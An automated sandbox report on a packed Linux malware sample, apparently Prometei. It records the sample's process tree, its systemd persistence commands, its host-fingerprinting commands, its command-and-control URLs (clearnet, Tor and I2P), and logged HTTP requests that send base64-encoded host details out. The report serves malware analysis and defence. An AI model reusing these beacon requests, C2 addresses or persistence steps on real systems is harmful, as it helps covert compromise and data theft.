Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
zJ4GNlikaw

Overview

General Information

Sample Name:zJ4GNlikaw
Analysis ID:559940
MD5:bce23a57891f9ad0dfbde06b00de2b93
SHA1:837126517e222e053cc04d0cd261a7e8572052f7
SHA256:0d71910feabf834689237d5b51392eaef8356503d5c2d29d930b8c9055b19fa9
Tags:64elf
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Found Tor onion address
Drops files in suspicious directories
Sample deletes itself
Sample is packed with UPX
Sample contains only a LOAD segment without any section mappings
Writes ELF files to disk
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "uname" command used to read OS and architecture name
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Sample listens on a socket
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Reads CPU information from /proc indicative of miner or evasive malware
Executes the "pgrep" command search for and/or send signals to processes

Classification

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:559940
Start date:26.01.2022
Start time:01:21:05
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 49s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:zJ4GNlikaw
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal64.evad.lin@0/5@2/0
  • VT rate limit hit for: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Command:/tmp/zJ4GNlikaw
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Starting...
System install...OK
Standard Error:Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.
  • system is lnxubuntu20
  • zJ4GNlikaw (PID: 5225, Parent: 5119, MD5: bce23a57891f9ad0dfbde06b00de2b93) Arguments: /tmp/zJ4GNlikaw
    • sh (PID: 5228, Parent: 5225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep zJ4GNlikaw"
      • sh New Fork (PID: 5229, Parent: 5228)
      • pgrep (PID: 5229, Parent: 5228, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep zJ4GNlikaw
    • sh (PID: 5232, Parent: 5225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof zJ4GNlikaw"
      • sh New Fork (PID: 5233, Parent: 5232)
      • pidof (PID: 5233, Parent: 5232, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof zJ4GNlikaw
    • sh (PID: 5236, Parent: 5225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 5237, Parent: 5236)
      • pgrep (PID: 5237, Parent: 5236, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay
    • sh (PID: 5240, Parent: 5225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof uplugplay"
      • sh New Fork (PID: 5241, Parent: 5240)
      • pidof (PID: 5241, Parent: 5240, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof uplugplay
    • sh (PID: 5244, Parent: 5225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 5245, Parent: 5244)
      • pgrep (PID: 5245, Parent: 5244, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup
    • sh (PID: 5250, Parent: 5225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"
      • sh New Fork (PID: 5251, Parent: 5250)
      • pidof (PID: 5251, Parent: 5250, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup
    • sh (PID: 5252, Parent: 5225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 5253, Parent: 5252)
      • systemctl (PID: 5253, Parent: 5252, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • sh (PID: 5259, Parent: 5225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 5271, Parent: 5259)
      • systemctl (PID: 5271, Parent: 5259, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service
    • sh (PID: 5275, Parent: 5225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 5276, Parent: 5275)
      • systemctl (PID: 5276, Parent: 5275, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service
  • systemd New Fork (PID: 5255, Parent: 5254)
  • snapd-env-generator (PID: 5255, Parent: 5254, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5273, Parent: 5272)
  • snapd-env-generator (PID: 5273, Parent: 5272, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5278, Parent: 1)
  • uplugplay (PID: 5278, Parent: 1, MD5: bce23a57891f9ad0dfbde06b00de2b93) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 5279, Parent: 5278)
      • sh (PID: 5280, Parent: 5279, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 5281, Parent: 5280)
        • uplugplay (PID: 5281, Parent: 5280, MD5: bce23a57891f9ad0dfbde06b00de2b93) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 5307, Parent: 5281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /proc/cpuinfo"
            • sh New Fork (PID: 5308, Parent: 5307)
            • cat (PID: 5308, Parent: 5307, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /proc/cpuinfo
          • sh (PID: 5311, Parent: 5281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5312, Parent: 5311)
            • dmidecode (PID: 5312, Parent: 5311, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5315, Parent: 5281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5316, Parent: 5315)
            • dmidecode (PID: 5316, Parent: 5315, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5319, Parent: 5281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5320, Parent: 5319)
            • dmidecode (PID: 5320, Parent: 5319, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5323, Parent: 5281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5324, Parent: 5323)
            • dmidecode (PID: 5324, Parent: 5323, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5327, Parent: 5281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5328, Parent: 5327)
            • dmidecode (PID: 5328, Parent: 5327, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5331, Parent: 5281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5332, Parent: 5331)
            • dmidecode (PID: 5332, Parent: 5331, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5335, Parent: 5281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode
            • sh New Fork (PID: 5336, Parent: 5335)
            • dmidecode (PID: 5336, Parent: 5335, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode
          • sh (PID: 5339, Parent: 5281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/os-release"
            • sh New Fork (PID: 5340, Parent: 5339)
            • cat (PID: 5340, Parent: 5339, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/os-release
          • sh (PID: 5343, Parent: 5281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 5344, Parent: 5343)
            • uptime (PID: 5344, Parent: 5343, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 5347, Parent: 5281, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 5348, Parent: 5347)
            • uname (PID: 5348, Parent: 5347, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
  • cleanup
SourceRuleDescriptionAuthorStrings
zJ4GNlikawSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x671d0:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x6723f:$s2: $Id: UPX
  • 0x671f0:$s3: $Info: This file is packed with the UPX executable packer
SourceRuleDescriptionAuthorStrings
/usr/sbin/uplugplaySUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x671d0:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x6723f:$s2: $Id: UPX
  • 0x671f0:$s3: $Info: This file is packed with the UPX executable packer

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: zJ4GNlikawVirustotal: Detection: 18%Perma Link
Source: zJ4GNlikawReversingLabs: Detection: 27%
Source: /usr/bin/pgrep (PID: 5229)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5237)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 5281)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 5344)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/cat (PID: 5308)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

Networking

barindex
Source: zJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: zJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: Mhttp://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
Source: /usr/sbin/uplugplay (PID: 5281)Socket: 0.0.0.0::88Jump to behavior
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=20&i=PG1TCJ8GTFD7733K HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDE6MjI6MTMgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuMjQsIDAuOTUsIDAuMzkNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=PG1TCJ8GTFD7733K&h=galassia&enckey=9UNOuoI4HO7z2juEGVXzZ14B86yLZV0kzRTkL30g0vgodyftH81kCBgwol4Mwe555o+sae8/aTlydoB8bk2MJ6g1nXa228vSyhwZgVCZYDPRqq4bj4Uintqr/xXdN/lSTVDrpk0ZmX92rkFNB9Y2gklDBAHABdGgvZM2OIXXy24= HTTP/1.0Host: p3.feefreepool.net
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: zJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
Source: zJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: zJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgi
Source: zJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg
Source: zJ4GNlikaw, uplugplay.10.drString found in binary or memory: http://upx.sf.net
Source: zJ4GNlikaw, 5225.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: unknownDNS traffic detected: queries for: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=20&i=PG1TCJ8GTFD7733K HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDE6MjI6MTMgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuMjQsIDAuOTUsIDAuMzkNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=PG1TCJ8GTFD7733K&h=galassia&enckey=9UNOuoI4HO7z2juEGVXzZ14B86yLZV0kzRTkL30g0vgodyftH81kCBgwol4Mwe555o+sae8/aTlydoB8bk2MJ6g1nXa228vSyhwZgVCZYDPRqq4bj4Uintqr/xXdN/lSTVDrpk0ZmX92rkFNB9Y2gklDBAHABdGgvZM2OIXXy24= HTTP/1.0Host: p3.feefreepool.net
Source: LOAD without section mappingsProgram segment: 0x400000
Source: zJ4GNlikaw, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: classification engineClassification label: mal64.evad.lin@0/5@2/0

Data Obfuscation

barindex
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
Source: /tmp/zJ4GNlikaw (PID: 5225)File written: /usr/sbin/uplugplayJump to dropped file
Source: /usr/sbin/uplugplay (PID: 5281)Reads from proc file: /proc/statJump to behavior
Source: /usr/bin/cat (PID: 5308)Reads from proc file: /proc/cpuinfoJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1582/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1582/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/3088/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/3088/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/230/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/230/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/110/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/110/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/231/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/231/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/111/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/111/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/232/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/232/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1579/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1579/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/112/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/112/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/233/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/233/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1699/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1699/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/113/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/113/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/234/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/234/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1335/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1335/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1698/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1698/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/114/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/114/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/235/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/235/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1334/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1334/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1576/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1576/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/2302/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/2302/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/115/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/115/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/236/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/236/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/116/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/116/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/237/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/237/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/117/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/117/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/118/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/118/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/910/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/910/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/119/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/119/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/912/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/912/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/10/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/10/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/2307/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/2307/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/11/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/11/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/918/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/918/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/5151/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/5151/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/12/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/12/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/13/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/13/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/14/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/14/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/15/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/15/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/16/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/16/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/17/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/17/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/18/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/18/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1594/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1594/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/120/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/120/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/121/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/121/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1349/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1349/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/1/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/122/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/122/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/243/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/243/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/123/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/123/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/2/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/2/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/124/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/124/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/3/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/3/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/4/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5245)File opened: /proc/4/cmdlineJump to behavior
Source: /bin/sh (PID: 5253)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5271)Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.serviceJump to behavior
Source: /bin/sh (PID: 5276)Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.serviceJump to behavior
Source: /tmp/zJ4GNlikaw (PID: 5225)File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)Jump to behavior
Source: /tmp/zJ4GNlikaw (PID: 5228)Shell command executed: sh -c "pgrep zJ4GNlikaw"Jump to behavior
Source: /tmp/zJ4GNlikaw (PID: 5232)Shell command executed: sh -c "pidof zJ4GNlikaw"Jump to behavior
Source: /tmp/zJ4GNlikaw (PID: 5236)Shell command executed: sh -c "pgrep uplugplay"Jump to behavior
Source: /tmp/zJ4GNlikaw (PID: 5240)Shell command executed: sh -c "pidof uplugplay"Jump to behavior
Source: /tmp/zJ4GNlikaw (PID: 5244)Shell command executed: sh -c "pgrep upnpsetup"Jump to behavior
Source: /tmp/zJ4GNlikaw (PID: 5250)Shell command executed: sh -c "pidof upnpsetup"Jump to behavior
Source: /tmp/zJ4GNlikaw (PID: 5252)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/zJ4GNlikaw (PID: 5259)Shell command executed: sh -c "systemctl enable uplugplay.service"Jump to behavior
Source: /tmp/zJ4GNlikaw (PID: 5275)Shell command executed: sh -c "systemctl start uplugplay.service"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5280)Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5307)Shell command executed: sh -c "cat /proc/cpuinfo"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5311)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5315)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5319)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5323)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5327)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5331)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5335)Shell command executed: sh -c dmidecodeJump to behavior
Source: /usr/sbin/uplugplay (PID: 5339)Shell command executed: sh -c "cat /etc/os-release"Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5343)Shell command executed: sh -c uptimeJump to behavior
Source: /usr/sbin/uplugplay (PID: 5347)Shell command executed: sh -c "uname -a"Jump to behavior
